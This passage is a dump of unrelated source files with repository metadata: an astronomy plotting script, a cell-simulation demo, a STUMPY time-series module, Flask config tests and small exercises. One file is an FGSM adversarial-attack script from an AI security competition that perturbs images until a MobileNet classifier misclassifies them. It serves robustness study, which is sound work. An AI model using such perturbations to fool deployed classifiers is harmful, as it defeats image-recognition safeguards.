'SXDS-X50', 'SXDS-X717', 'SXDS-X735', 'SXDS-X763', 'SXDS-X969']
# Xuheng's image-decomposition results (stellar mass and R-band luminosity) plus errors.
Mstar = load_host_p(ID=ID, folder='../../')[1]
Mstar_err = load_err(prop = 'Mstar', ID=ID)
LR = load_host_p(ID=ID, folder='../../', dm = 0)[0] #!!! This dm is important
LR_err = load_err(prop = 'LR', ID=ID)
Fede = np.loadtxt('Summary.txt') #0ID 1M*_SED 2M*_IMAGEDEC 3LR_SED 4LR_IMAGEDEC 5agreement
# Boolean mask of usable rows; LR_SED == -99 flags missing data (excludes CID255).
# Fix: this mask was previously named ``bool`` (shadowing the builtin) and was
# wrapped in a one-element list, relying on a deprecated NumPy indexing path.
valid = Fede[:, 3] != -99
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8., 12, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
#plt.plot(LR[valid], Fede[:,3][valid], 'bo', label='SED only')
plt.errorbar(LR[valid], Fede[:,3][valid], xerr=[np.abs(LR_err)[:,0][valid], np.abs(LR_err)[:,1][valid]],yerr=0.2 + np.zeros(len(Mstar[valid])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(LR[valid], Fede[:,4][valid], 'r^', label='fix HST result')
plt.xlim([8.8,11.8])
plt.ylim([8.8,11.8])
plt.title("Comparison of LR",fontsize=35)  # typo fix: was "Comparsion"
plt.xlabel("Xuheng log$(L_R/L_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(L_R/L_{\odot})$",fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show()
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8.5, 12.5, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
plt.errorbar(Mstar[valid], Fede[:,1][valid], xerr=[np.abs(Mstar_err)[:,0][valid], np.abs(Mstar_err)[:,1][valid]],yerr=0.3 + np.zeros(len(Mstar[valid])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(Mstar[valid], Fede[:,2][valid], 'r^', label='fix HST result')
plt.xlim([8.5,12.5])
plt.ylim([8.5,12.5])
plt.title("Comparison of M*",fontsize=35)  # typo fix: was "Comparsion"
plt.xlabel("Xuheng log$(M_*/M_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(M_*/M_{\odot})$", fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show()
"dingxuheng@mail.bnu.edu.cn"
] | dingxuheng@mail.bnu.edu.cn |
dcc3c59f832a438160969f7eff0db6008ce5f49a | 632dcb4e37cadd87cb7ff8715b0048df5cd0d11b | /CompuCell3D/core/Demos/CC3DPy/scripts/AdhesionDemo.py | a0e3522ec008b21130e6d566bf455e82f0417b33 | [
"MIT"
] | permissive | CompuCell3D/CompuCell3D | df638e3bdc96f84b273978fb479842d071de4a83 | 65a65eaa693a6d2b3aab303f9b41e71819f4eed4 | refs/heads/master | 2023-08-26T05:22:52.183485 | 2023-08-19T17:13:19 | 2023-08-19T17:13:19 | 12,253,945 | 51 | 41 | null | 2023-08-27T16:36:14 | 2013-08-20T20:53:07 | C++ | UTF-8 | Python | false | false | 3,763 | py | """
This example demonstrates how to specify cell adhesion on the basis of molecular species.
"""
__author__ = "T.J. Sego, Ph.D."
__email__ = "tjsego@iu.edu"
from cc3d.core.PyCoreSpecs import Metadata, PottsCore
from cc3d.core.PyCoreSpecs import CellTypePlugin, VolumePlugin, ContactPlugin
from cc3d.core.PyCoreSpecs import UniformInitializer
from cc3d.core.PyCoreSpecs import AdhesionFlexPlugin
from cc3d.CompuCellSetup.CC3DCaller import CC3DSimService
def main():
    """Build, visualize, and interactively step a 2D CC3D simulation whose
    cell adhesion is driven by per-cell-type molecular densities."""
    ###############
    # Basic setup #
    ###############
    # An interactive CC3D simulation can be initialized from a list of core specs.
    # Start a list of core specs that define the simulation by specifying a two-dimensional simulation
    # with a 100x100 lattice and second-order Potts neighborhood, and metadata to use multithreading
    dim_x = dim_y = 100
    specs = [
        Metadata(num_processors=4),
        PottsCore(dim_x=dim_x,
                  dim_y=dim_y,
                  neighbor_order=2,
                  boundary_x="Periodic",
                  boundary_y="Periodic")
    ]
    ##############
    # Cell Types #
    ##############
    # Define three cell types called "T1" through "T3".
    cell_types = ["T1", "T2", "T3"]
    specs.append(CellTypePlugin(*cell_types))
    #####################
    # Volume Constraint #
    #####################
    # Assign a volume constraint to all cell types.
    volume_specs = VolumePlugin()
    for ct in cell_types:
        volume_specs.param_new(ct, target_volume=25, lambda_volume=2)
    specs.append(volume_specs)
    ############
    # Adhesion #
    ############
    # Assign uniform adhesion to all cells, and additional adhesion by molecular species
    contact_specs = ContactPlugin(neighbor_order=2)
    for idx1 in range(len(cell_types)):
        contact_specs.param_new(type_1="Medium", type_2=cell_types[idx1], energy=16)
        for idx2 in range(idx1, len(cell_types)):
            contact_specs.param_new(type_1=cell_types[idx1], type_2=cell_types[idx2], energy=16)
    specs.append(contact_specs)
    # Species M1 on T1 cells self-attracts (negative energy); M2 on T2 self-repels.
    adhesion_specs = AdhesionFlexPlugin(neighbor_order=2)
    adhesion_specs.density_new(molecule="M1", cell_type="T1", density=1.0)
    adhesion_specs.density_new(molecule="M2", cell_type="T2", density=1.0)
    formula = adhesion_specs.formula_new()
    formula.param_set("M1", "M1", -10.0)
    formula.param_set("M1", "M2", 0.0)
    formula.param_set("M2", "M2", 10.0)
    specs.append(adhesion_specs)
    ####################################
    # Cell Distribution Initialization #
    ####################################
    # Initialize cells over the entire domain.
    unif_init_specs = UniformInitializer()
    unif_init_specs.region_new(width=5, pt_min=(0, 0, 0), pt_max=(dim_x, dim_y, 1),
                               cell_types=["T1", "T1", "T2", "T2", "T3"])
    specs.append(unif_init_specs)
    #####################
    # Simulation Launch #
    #####################
    # Initialize a CC3D simulation service instance and register all simulation specification.
    cc3d_sim = CC3DSimService()
    cc3d_sim.register_specs(specs)
    cc3d_sim.run()
    cc3d_sim.init()
    cc3d_sim.start()
    #################
    # Visualization #
    #################
    # Show a single frame to visualize simulation data as it is generated.
    cc3d_sim.visualize()
    #############
    # Execution #
    #############
    # Wait for the user to trigger execution
    input('Press any key to continue...')
    # Execute 10k steps
    while cc3d_sim.current_step < 10000:
        cc3d_sim.step()
    # Report performance
    print(cc3d_sim.profiler_report)
    # Wait for the user to trigger termination
    input('Press any key to close...')
if __name__ == '__main__':
    main()
| [
"tjsego@gmail.com"
] | tjsego@gmail.com |
783ec51dceb9fa9c98c3845feb2efa5b9fc3a98a | fb3caa66ac0b2254b422303d670a70e597067758 | /201911_AI_Sec_Baidu/core-attack-codes/b_04.py | 03f7281f7068cfaf99a57ec7f5d848afd55c0a40 | [] | no_license | dyngq/Competitions | 065ec9f153919950b161aaa9fff6a9de9e29ba32 | e9b7ff8fbe038e148bc61b21b077f35cdc5368a9 | refs/heads/master | 2021-06-13T13:55:11.352531 | 2021-05-08T09:49:24 | 2021-05-08T09:49:24 | 186,392,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,927 | py | #coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import functools
import numpy as np
import paddle.fluid as fluid
# Load project-local helper modules.
import models
from attack.attack_pp import FGSM, PGD
from utils import init_prog, save_adv_image, process_img, tensor2img, calc_mse, add_arguments, print_arguments
#######parse parameters
# Command-line interface: number of classes, image shape, and I/O directories.
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
add_arg('class_dim', int, 121, "Class number.")
add_arg('shape', str, "3,224,224", "output image shape")
add_arg('input', str, "./input2_image/", "Input directory with images")
add_arg('output', str, "./input3_image/", "Output directory with images")
args = parser.parse_args()
print_arguments(args)
######Init args
# Derived configuration: CHW image shape, target model and its weight location.
image_shape = [int(m) for m in args.shape.split(",")]
class_dim=args.class_dim
input_dir = args.input
output_dir = args.output
model_name="MobileNetV2_x2_0"
pretrained_model="./models_parameters/MobileNetV2_x2_0"
val_list = 'val_list.txt'
use_gpu=True
######Attack graph
adv_program=fluid.Program()
# Build the attack graph: a forward pass of the classifier over the input image.
with fluid.program_guard(adv_program):
    input_layer = fluid.layers.data(name='image', shape=image_shape, dtype='float32')
    # Allow gradients to be computed with respect to the input image.
    input_layer.stop_gradient=False
    # model definition
    model = models.__dict__[model_name]()
    out_logits = model.net(input=input_layer, class_dim=class_dim)
    out = fluid.layers.softmax(out_logits)
place = fluid.CUDAPlace(0) if use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
# Load the pretrained model parameters.
fluid.io.load_persistables(exe, pretrained_model)
# Put the batch-norm layers of adv_program into inference state.
init_prog(adv_program)
# Clone an evaluation-mode program for testing.
eval_program = adv_program.clone(for_test=True)
# Define the gradient of the cross-entropy loss w.r.t. the input image.
with fluid.program_guard(adv_program):
    label = fluid.layers.data(name="label", shape=[1] ,dtype='int64')
    loss = fluid.layers.cross_entropy(input=out, label=label)
    gradients = fluid.backward.gradients(targets=loss, inputs=[input_layer])[0]
######Inference
def inference(img):
    """Run the evaluation program on a single preprocessed image and return
    (predicted class index, softmax score of that class)."""
    fetch_list = [out.name]
    result = exe.run(eval_program,
                     fetch_list=fetch_list,
                     feed={ 'image':img })
    # result[0] is the fetched softmax tensor; the second [0] selects the
    # only row of the batch.
    result = result[0][0]
    pred_label = np.argmax(result)
    # .copy() detaches the returned scalar from the fetched buffer.
    pred_score = result[pred_label].copy()
    return pred_label, pred_score
######FGSM attack
#untarget attack
def attack_nontarget_by_FGSM(img, src_label):
    """Untargeted FGSM attack on *img*.

    Starting from a small step size, repeatedly generate an adversarial
    example and double the step until the model's prediction moves away
    from *src_label* or the step exceeds the epsilon budget.  Returns the
    (possibly still unsuccessful) adversarial image via ``tensor2img``.
    """
    pred_label = src_label
    # Step size and perturbation budget, in normalized pixel units.
    step = 8.0/64.0
    eps = 32.0/64.0
    while pred_label == src_label:
        # Generate the adversarial example.
        adv=FGSM(adv_program=adv_program,eval_program=eval_program,gradients=gradients,o=img,
                 input_layer=input_layer,output_layer=out,step_size=step,epsilon=eps,
                 isTarget=False,target_label=0,use_gpu=use_gpu)
        pred_label, pred_score = inference(adv)
        step *= 2
        if step > eps:
            break
    print("Test-score: {0}, class {1}".format(pred_score, pred_label))
    adv_img=tensor2img(adv)
    return adv_img
def attack_nontarget_by_FGSM_test(img, src_label):
    """Debug helper: print the source label and then the model's actual
    prediction for *img* (no attack is performed)."""
    pred_label = src_label
    print("---------------AAAA-------------------Test-score: {0}, class {1}".format(pred_label, pred_label))
    pred_label, pred_score = inference(img)
    print("---------------BBBB-------------------Test-score: {0}, class {1}".format(pred_score, pred_label))
####### Main #######
def get_original_file(filepath):
    """Parse a validation list file whose lines are ``<label> <filename>``.

    Returns a list of ``[filename, int(label)]`` pairs, one per line.
    """
    with open(filepath, 'r') as listing:
        entries = listing.read().splitlines()
    records = []
    for entry in entries:
        label, file_name = entry.strip().split()
        records.append([file_name, int(label)])
    return records
def gen_adv():
    """Generate adversarial examples for every image listed in ``val_list``,
    save them to ``output_dir`` (as .jpg), and report the average MSE
    distortion over the whole set."""
    mse = 0
    original_files = get_original_file(input_dir + val_list)
    for filename, label in original_files:
        img_path = input_dir + filename
        print("Image: {0} ".format(img_path))
        img=process_img(img_path)
        # attack_nontarget_by_FGSM_test(img, label)
        # Only attack images the model already classifies correctly;
        # otherwise keep the original image unchanged.
        prelabel, xxxx = inference(img)
        if label == prelabel:
            adv_img = attack_nontarget_by_FGSM(img, label)
        else:
            adv_img = tensor2img(img)
        image_name, image_ext = filename.split('.')
        ##Save adversarial image(.png)
        save_adv_image(adv_img, output_dir+image_name+'.jpg')
        # attack_nontarget_by_FGSM_test(img, label)
        # Accumulate the distortion between original and adversarial images.
        org_img = tensor2img(img)
        score = calc_mse(org_img, adv_img)
        print(score)
        mse += score
    print("ADV {} files, AVG MSE: {} ".format(len(original_files), mse/len(original_files)))
def main():
    """Entry point: run the adversarial-example generation pipeline."""
    gen_adv()
if __name__ == '__main__':
    main()
| [
"dyngqk@163.com"
] | dyngqk@163.com |
c4554c601893281110fded6f14187ef73c6df8da | 5086e9d2ae0c146f80f546e97788a2e4b1e5438f | /stumpy/aampdist_snippets.py | cbf29b4fd5eb31168e0994c1091e9d1e56555ee2 | [
"BSD-3-Clause"
] | permissive | HuoHuoisAlan/stumpy | a6c9952c2dd3343710521858295145b7eca8f727 | 01e867cfbef6f827b5b28913fd76a4eda59c5fed | refs/heads/main | 2023-04-18T17:42:47.952135 | 2021-05-09T23:47:01 | 2021-05-09T23:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,043 | py | # STUMPY
# Copyright 2019 TD Ameritrade. Released under the terms of the 3-Clause BSD license.
# STUMPY is a trademark of TD Ameritrade IP Company, Inc. All rights reserved.
import math
import numpy as np
from .core import check_window_size
from .aampdist import _aampdist_vect
def _get_all_aampdist_profiles(
    T,
    m,
    percentage=1.0,
    s=None,
    mpdist_percentage=0.05,
    mpdist_k=None,
    mpdist_custom_func=None,
):
    """
    For each non-overlapping subsequence, `S[i]`, in `T`, compute the matrix profile
    distance measure vector between the `i`th non-overlapping subsequence and each
    sliding window subsequence, `T[j : j + m]`, within `T` where `j < len(T) - m + 1`.
    Parameters
    ----------
    T : ndarray
        The time series or sequence for which to find the snippets
    m : int
        The window size for each non-overlapping subsequence, `S[i]`.
    percentage : float, default 1.0
        With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
        is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
        `percentage == 1.0`, then the full length of `S[i]` is used to compute the
        `mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
        is used to compute `mpdist_vect`.
    s : int, default None
        With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
        is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
        When `s == m`, then the full length of `S[i]` is used to compute the
        `mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
        each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
        the `percentage` parameter is ignored.
    mpdist_percentage : float, default 0.05
        The percentage of distances that will be used to report `mpdist`. The value
        is between 0.0 and 1.0.
    mpdist_k : int
        Specify the `k`th value in the concatenated matrix profiles to return. When
        `mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.
    mpdist_custom_func : object, default None
        A custom user defined function for selecting the desired value from the
        sorted `P_ABBA` array. This function may need to leverage `functools.partial`
        and should take `P_ABBA` as its only input parameter and return a single
        `MPdist` value. The `percentage` and `k` parameters are ignored when
        `mpdist_custom_func` is not None.
    Returns
    -------
    D : ndarray
        MPdist profiles
    Notes
    -----
    `DOI: 10.1109/ICBK.2018.00058 \
    <https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__
    See Table II
    """
    if m > T.shape[0] // 2: # pragma: no cover
        raise ValueError(
            f"The window size {m} for each non-overlapping subsequence is too large "
            f"for a time series with length {T.shape[0]}. "
            f"Please try `m <= len(T) // 2`."
        )
    # Right-pad T with NaN so its length is a whole multiple of m; the padded
    # columns are trimmed from D again at the end.
    right_pad = 0
    if T.shape[0] % m != 0:
        right_pad = int(m * np.ceil(T.shape[0] / m) - T.shape[0])
        pad_width = (0, right_pad)
        T = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
    n_padded = T.shape[0]
    D = np.empty(((n_padded // m) - 1, n_padded - m + 1))
    # Resolve the sub-subsequence length: an explicit `s` wins (clamped to m);
    # otherwise it is derived from `percentage`, clamped to [0.0, 1.0].
    if s is not None:
        s = min(int(s), m)
    else:
        percentage = min(percentage, 1.0)
        percentage = max(percentage, 0.0)
        s = min(math.ceil(percentage * m), m)
    # Iterate over non-overlapping subsequences, see Definition 3
    for i in range((n_padded // m) - 1):
        start = i * m
        stop = (i + 1) * m
        S_i = T[start:stop]
        D[i, :] = _aampdist_vect(
            S_i,
            T,
            s,
            percentage=mpdist_percentage,
            k=mpdist_k,
            custom_func=mpdist_custom_func,
        )
    # Drop the trailing columns that correspond to the NaN padding.
    stop_idx = n_padded - m + 1 - right_pad
    D = D[:, :stop_idx]
    return D
def aampdist_snippets(
    T,
    m,
    k,
    percentage=1.0,
    s=None,
    mpdist_percentage=0.05,
    mpdist_k=None,
):
    """
    Identify the top `k` snippets that best represent the time series, `T`
    Parameters
    ----------
    T : ndarray
        The time series or sequence for which to find the snippets
    m : int
        The snippet window size
    k : int
        The desired number of snippets
    percentage : float, default 1.0
        With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
        is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
        `percentage == 1.0`, then the full length of `S[i]` is used to compute the
        `mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
        is used to compute `mpdist_vect`.
    s : int, default None
        With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
        is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
        When `s == m`, then the full length of `S[i]` is used to compute the
        `mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
        each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
        the `percentage` parameter is ignored.
    mpdist_percentage : float, default 0.05
        The percentage of distances that will be used to report `mpdist`. The value
        is between 0.0 and 1.0.
    mpdist_k : int
        Specify the `k`th value in the concatenated matrix profiles to return. When
        `mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.
    Returns
    -------
    snippets : ndarray
        The top `k` snippets
    snippets_indices : ndarray
        The index locations for each of top `k` snippets
    snippets_profiles : ndarray
        The MPdist profiles for each of the top `k` snippets
    snippets_fractions : ndarray
        The fraction of data that each of the top `k` snippets represents
    snippets_areas : ndarray
        The area under the curve corresponding to each profile for each of the top `k`
        snippets
    Notes
    -----
    `DOI: 10.1109/ICBK.2018.00058 \
    <https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__
    See Table I
    """
    if m > T.shape[0] // 2: # pragma: no cover
        raise ValueError(
            f"The snippet window size of {m} is too large for a time series with "
            f"length {T.shape[0]}. Please try `m <= len(T) // 2`."
        )
    check_window_size(m, max_size=T.shape[0] // 2)
    D = _get_all_aampdist_profiles(
        T,
        m,
        percentage=percentage,
        s=s,
        mpdist_percentage=mpdist_percentage,
        mpdist_k=mpdist_k,
    )
    # Pad T to a multiple of m so candidate snippet start indices line up
    # with the rows of D.
    pad_width = (0, int(m * np.ceil(T.shape[0] / m) - T.shape[0]))
    T_padded = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
    n_padded = T_padded.shape[0]
    snippets = np.empty((k, m))
    snippets_indices = np.empty(k, dtype=np.int64)
    snippets_profiles = np.empty((k, D.shape[-1]))
    snippets_fractions = np.empty(k)
    snippets_areas = np.empty(k)
    Q = np.full(D.shape[-1], np.inf)
    indices = np.arange(0, n_padded - m, m)
    # Greedy selection (see Table I): at each round pick the candidate whose
    # profile most reduces the running element-wise minimum Q.
    for i in range(k):
        profile_areas = np.sum(np.minimum(D, Q), axis=1)
        idx = np.argmin(profile_areas)
        snippets[i] = T[indices[idx] : indices[idx] + m]
        snippets_indices[i] = indices[idx]
        snippets_profiles[i] = D[idx]
        snippets_areas[i] = np.sum(np.minimum(D[idx], Q))
        Q[:] = np.minimum(D[idx], Q)
    # Fraction of time points each snippet "covers", i.e. where its profile
    # attains the overall minimum; covered points are then excluded from
    # later snippets' counts.
    total_min = np.min(snippets_profiles, axis=0)
    for i in range(k):
        mask = snippets_profiles[i] <= total_min
        snippets_fractions[i] = np.sum(mask) / total_min.shape[0]
        total_min = total_min - mask.astype(np.float64)
    return (
        snippets,
        snippets_indices,
        snippets_profiles,
        snippets_fractions,
        snippets_areas,
    )
| [
"seanmylaw@gmail.com"
] | seanmylaw@gmail.com |
43bb8e261178ccdbc8e0f38e34e559c1b2793e98 | 7bfb0fff9d833e53573c90f6ec58c215b4982d14 | /1688_count_matches.py | 0df81efb7ce040266c81c8a31339b3ec5db755e9 | [
"MIT"
] | permissive | claytonjwong/leetcode-py | 6619aa969649597a240e84bdb548718e754daa42 | 16bbf8ac0ba5c80fe3ef67ade0d61a12991270a7 | refs/heads/master | 2023-07-14T23:40:26.569825 | 2021-08-22T17:23:20 | 2021-08-22T17:23:20 | 279,882,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #
# 1688. Count of Matches in Tournament
#
# Q: https://leetcode.com/problems/count-of-matches-in-tournament/
# A: https://leetcode.com/problems/count-of-matches-in-tournament/discuss/970250/Kt-Js-Py3-Cpp-1-Liners
#
class Solution:
    def numberOfMatches(self, N: int) -> int:
        """Return the number of matches played in a single-elimination
        tournament that starts with N teams and ends with one winner.

        Each round, N // 2 matches are played; the winners plus any team
        with a bye (odd N) advance to the next round.
        """
        total = 0
        while N > 1:
            played, byes = divmod(N, 2)
            total += played
            N = played + byes
        return total
| [
"claytonjwong@gmail.com"
] | claytonjwong@gmail.com |
8149d78a21a4530ab537abc4fe3892b1c77bac7f | a47ac7c64cb6bb1f181eadff8e4b24735c19080a | /PythonStudy/7-模块/a/Titan.py | 957bf78140bb6a110f980f0763207417854d9978 | [
"MIT"
] | permissive | CoderTitan/PythonDemo | 6dcc88496b181df959a9d43b963fe43a6e4cb032 | feb5ef8be91451b4622764027ac684972c64f2e0 | refs/heads/master | 2020-03-09T09:15:28.299827 | 2018-08-21T03:43:25 | 2018-08-21T03:43:25 | 128,708,650 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 669 | py |
# Each .py file is a module.
'''
def sayGood():
    print('good')
def sayNice():
    print('nice')
def sayBad():
    print('bad')
age = 20
name = 'titan'
print('这是Titan模块')
'''
# Every module has a __name__ attribute; it equals '__main__' only when the
# module is executed directly, otherwise the module has been imported by
# another file.
# If this file is the program's entry file, __name__ is '__main__'.
if __name__ == '__main__':
    print('这是Titan模块--a')
else:
    def sayGood():
        print('good--a')
    def sayNice():
        print('nice--a')
    def sayBad():
        print('bad--a')
    age = 20
    name = 'titan--a'
| [
"quanjunt@163.com"
] | quanjunt@163.com |
fa060e2a53f5effc20a8ce419c69bbe06bf117b4 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_22416.py | 84c894c7c3f546ab1aaffeb33d766e1d830f19d6 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | # Iron Python Error: expected <type 'bytes'> or bytearray, got <type 'str'> for Serial comm
# NOTE(review): message.encode('utf-8') already returns a bytes object; the
# extra bytes(...) wrapper only copies it — presumably an IronPython
# workaround per the error quoted above. TODO confirm before removing.
ser.write(bytes(message.encode('utf-8')))
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
8bd9e1c2de7c0fb1b38880603978273791276919 | 854ec5a700af132a3423be5a27a8857d2d8357a6 | /project/tests/test__config.py | c7f681e4c786c681690d511179d626d9967463b3 | [
"MIT"
] | permissive | mohammad-chavoshipor/flask-challenge | 8f53ce80b84e88c101eec4e7e216a9e7625eec62 | 6902a43d6c5f435edc668bc51fc08cd785ffb965 | refs/heads/master | 2021-06-12T15:04:27.211542 | 2017-03-10T19:02:58 | 2017-03-10T19:02:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,736 | py | # project/server/tests/integration/test_config.py
import unittest
from flask import current_app
from flask_testing import TestCase
from project.server import app
class TestDevelopmentConfig(TestCase):
    """Checks for the development configuration profile."""

    def create_app(self):
        # flask_testing hook: configure and return the app under test.
        app.config.from_object('project.server.config.DevelopmentConfig')
        return app

    def test_app_is_development(self):
        # Development runs with DEBUG on, TESTING off, and the *_dev files.
        self.assertFalse(current_app.config['TESTING'])
        self.assertIs(app.config['DEBUG'], True)
        self.assertIsNotNone(current_app)
        self.assertNotIn('data_test.json', app.config['DATA_FILE'])
        self.assertIn('data_dev.json', app.config['DATA_FILE'])
        self.assertNotIn('stats_test.json', app.config['STATS_FILE'])
        self.assertIn('stats_dev.json', app.config['STATS_FILE'])
class TestTestingConfig(TestCase):
    """Checks for the testing configuration profile."""

    def create_app(self):
        # flask_testing hook: configure and return the app under test.
        app.config.from_object('project.server.config.TestingConfig')
        return app

    def test_app_is_testing(self):
        # Testing runs with both TESTING and DEBUG on, and the *_test files.
        self.assertTrue(current_app.config['TESTING'])
        self.assertIs(app.config['DEBUG'], True)
        self.assertIn('data_test.json', app.config['DATA_FILE'])
        self.assertNotIn('data_dev.json', app.config['DATA_FILE'])
        self.assertIn('stats_test.json', app.config['STATS_FILE'])
        self.assertNotIn('stats_dev.json', app.config['STATS_FILE'])
class TestProductionConfig(TestCase):
    """Checks for the production configuration profile."""

    def create_app(self):
        # flask_testing hook: configure and return the app under test.
        app.config.from_object('project.server.config.ProductionConfig')
        return app

    def test_app_is_production(self):
        # Production must have both TESTING and DEBUG switched off.
        self.assertFalse(current_app.config['TESTING'])
        self.assertIs(app.config['DEBUG'], False)
# Allow running this test module directly (python test__config.py).
if __name__ == '__main__':
    unittest.main()
| [
"hermanmu@gmail.com"
] | hermanmu@gmail.com |
5d5edef53054c600d6795dfea1de892c610022d3 | aa8fac8fc911912b21658b00febb3e23383c617e | /util/network.py | 99cfe79ccc6c2b040a83ff9414ae9682245e6a2a | [] | no_license | atrox3d/1HDOC-flask-secrets | 26606c96e8ce82265dba3761a142bb1e25da1c8d | c28cdab14cb7932e59baec0f9e9976311a381907 | refs/heads/master | 2023-04-08T17:38:18.443428 | 2021-04-19T16:32:25 | 2021-04-19T16:32:25 | 355,586,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | import socket
def get_ipaddress():
    """Return the IPv4 address that the local hostname resolves to."""
    hostname = socket.gethostname()
    return socket.gethostbyname(hostname)
| [
"atrox3d@gmail.com"
] | atrox3d@gmail.com |
83bcec5f7f7b822b4d5ee74bb80925b5e1c023e9 | 689eff74c3687f8386cbbdf4ff1d0c6b01568ba6 | /app/base/views.py | 281a6fd672ab301a139d9efebe1d4050f82f5bff | [] | no_license | huyquyet/projectBRS | fc50aac595112823c44952e137f11d6a3f6765a3 | 5a2f994a98f97db4b1717bc6187910ce9ad889e6 | refs/heads/master | 2021-01-10T10:09:44.265887 | 2015-12-16T03:53:39 | 2015-12-16T03:53:39 | 44,585,735 | 0 | 0 | null | 2015-12-15T07:16:39 | 2015-10-20T06:08:22 | HTML | UTF-8 | Python | false | false | 815 | py | from django.db.models import Avg
from django.views.generic.base import ContextMixin
from app.book.models import Book
from app.category.models import Category
__author__ = 'FRAMGIA\nguyen.huy.quyet'
class BaseView(ContextMixin):
    """Context mixin adding the shared book/category lists used by pages."""
    model = Book

    def get_context_data(self, **kwargs):
        """Extend the base context with top-rated books and all categories."""
        context = super(BaseView, self).get_context_data(**kwargs)
        context['base_list_category'] = return_list_category()
        context['base_list_book'] = return_list_book()
        return context
def return_list_book():
    """Return the six best-rated books, each annotated with its average
    rating and its review count."""
    top_books = Book.objects.annotate(Avg('rating_book__rate')).order_by('-rating_book__rate__avg')[0:6]
    for entry in top_books:
        entry.rate = entry.get_rating_book()
        entry.count_review = entry.review_book.all().count()
    return top_books
def return_list_category():
    """Return a queryset of every category."""
    return Category.objects.all()
| [
"nguyenhuyquyet90@gmail.com"
] | nguyenhuyquyet90@gmail.com |
a58b5f4e97d7f6162d8a7c522dc379644b1730e2 | 13130259156f6f9d16670cea88aa2608dd477d16 | /goeievraag/category/categorize_question.py | a12d559ec35a110035014a626c69944b5e85b342 | [] | no_license | fkunneman/DiscoSumo | d459251d543be5f4df38292a96f52baf4b520a0b | ed8f214834cf0c2e04a3bc429253502f7e79fbf8 | refs/heads/master | 2022-12-14T13:34:41.496963 | 2019-07-31T15:57:02 | 2019-07-31T15:57:02 | 140,422,779 | 2 | 1 | null | 2022-12-08T04:57:55 | 2018-07-10T11:36:00 | Python | UTF-8 | Python | false | false | 1,203 | py |
from qcat import QCat
import sys
# Command-line arguments: paths to the trained model and its companion files.
model_file = sys.argv[1]
label_encoder_file = sys.argv[2]
category2id_file = sys.argv[3]
vocabulary_file = sys.argv[4]
# Build the question categorizer from the serialized artifacts.
qc = QCat(model_file,label_encoder_file,category2id_file,vocabulary_file)
test_questions = ["Kunnen we volgende week weer schaatsen op natuurijs",
"Wat is het lekkerste recept voor boerenkool",
"Hoeveel kleuren heeft de regenboog",
"Wat is de symbolische betekenis van de kip die de vrouw vasthoudt op het schilderij De Nachtwacht",
"waar kan ik in amsterdam het best een dwerg hamster aanschaffen",
"Waarom zie je nooit babyduifjes",
"Hoe krijg je een weggelopen konijn ( ontsnapt ) weer terug",
"Wat is het synoniem voor synoniem",
"wat s de reden dat vogels niet vastvriezen aan een ijsschots",
"Als een winkel 24 uur per dag en 365 dagen per jaar geopend is , waarom zit er dan een slot op de deur"]
print('Now categorizing questions')
# Ask the categorizer for the top-5 category predictions per question.
results = qc.main(test_questions,5)
for i,result in enumerate(results):
    print('TOP 5 categories for question',test_questions[i],':',result)
| [
"thiago.castro.ferreira@gmail.com"
] | thiago.castro.ferreira@gmail.com |
a1b9bf680534dbbfbc310a822deb14f1bb4e2dad | 51205b1a93bce66f1f47bd9eb5410e6f9b4c4da1 | /py/loop.py | e301447f632f4950299dabe067ddf745977ba7b9 | [
"MIT"
